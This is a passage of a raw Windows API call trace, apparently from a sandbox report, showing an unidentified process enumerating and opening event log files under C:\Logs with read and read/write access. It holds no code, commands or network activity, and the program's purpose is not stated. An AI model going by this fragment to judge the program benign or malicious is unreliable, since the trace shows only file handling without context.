(in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82688 | out: hHeap=0x20000) returned 1 [0071.479] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.479] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.479] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.479] CloseHandle (hObject=0x428) returned 1 [0071.479] AreFileApisANSI () returned 1 [0071.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0071.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82058 [0071.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x82058, cchWideChar=66 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 66 [0071.479] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.480] GetFileType (hFile=0x428) returned 0x1 [0071.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82058 | out: hHeap=0x20000) returned 1 [0071.480] CloseHandle (hObject=0x428) returned 1 [0071.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0071.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0071.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0071.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0071.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0071.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0071.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0071.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0071.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0071.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0071.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0071.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0071.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0071.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0071.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0071.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0071.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0071.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0071.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0071.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0071.480] AreFileApisANSI () returned 1 [0071.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0071.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82568 [0071.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x82568, cchWideChar=66 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 66 [0071.480] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd418fcc3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd418fcc3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82568 | out: hHeap=0x20000) returned 1 [0071.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0071.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0071.481] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.481] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.481] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd418fcc3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd418fcc3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", cAlternateFileName="MI8196~1.EVT")) returned 1 [0071.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0071.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0071.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0071.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46208 [0071.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0071.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x30c98 [0071.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0071.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0071.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0071.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0071.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0071.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0071.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0071.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0071.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0071.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0071.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0071.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0071.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0071.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x5e570 [0071.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0071.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x26df0 [0071.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0071.482] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.482] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.482] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.482] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x26df0 | out: hHeap=0x20000) returned 1 [0071.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0071.482] AreFileApisANSI () returned 1 [0071.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", lpUsedDefaultChar=0x0) returned 65 [0071.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0071.482] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.482] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0071.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0071.482] AreFileApisANSI () returned 1 [0071.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0071.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x823b8 [0071.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x823b8, cchWideChar=65 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 65 [0071.482] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.482] GetFileType (hFile=0x428) returned 0x1 [0071.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x823b8 | out: hHeap=0x20000) returned 1 [0071.483] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.483] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.483] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.483] CloseHandle (hObject=0x428) returned 1 [0071.483] AreFileApisANSI () returned 1 [0071.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0071.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82dd8 [0071.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x82dd8, cchWideChar=65 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 65 [0071.483] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.483] GetFileType (hFile=0x428) returned 0x1 [0071.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82dd8 | out: hHeap=0x20000) returned 1 [0071.484] CloseHandle (hObject=0x428) returned 1 [0071.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0071.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0071.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0071.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0071.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0071.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0071.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0071.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0071.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0071.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0071.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0071.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0071.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0071.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0071.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0071.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0071.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0071.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0071.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0071.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0071.484] AreFileApisANSI () returned 1 [0071.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0071.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x825f8 [0071.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x825f8, cchWideChar=65 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 65 [0071.484] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd418fcc3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd418fcc3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x825f8 | out: hHeap=0x20000) returned 1 [0071.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0071.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0071.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0071.485] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.485] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.485] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd41b5f2d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd41b5f2d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", cAlternateFileName="MIE36C~1.EVT")) returned 1 [0071.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0071.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0071.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0071.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0071.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0071.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46518 [0071.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0071.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0071.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0071.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0071.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46518 | out: hHeap=0x20000) returned 1 [0071.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0071.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0071.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0071.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0071.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0071.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0071.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0071.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0071.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0071.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0071.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0071.485] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.486] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.486] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.486] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0071.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0071.486] AreFileApisANSI () returned 1 [0071.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx", lpUsedDefaultChar=0x0) returned 55 [0071.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0071.486] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.486] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0071.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0071.486] AreFileApisANSI () returned 1 [0071.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0071.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75d50 [0071.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x75d50, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 55 [0071.486] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.486] GetFileType (hFile=0x428) returned 0x1 [0071.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0071.486] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.487] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.487] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.487] CloseHandle (hObject=0x428) returned 1 [0071.487] AreFileApisANSI () returned 1 [0071.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0071.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x76278 [0071.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, 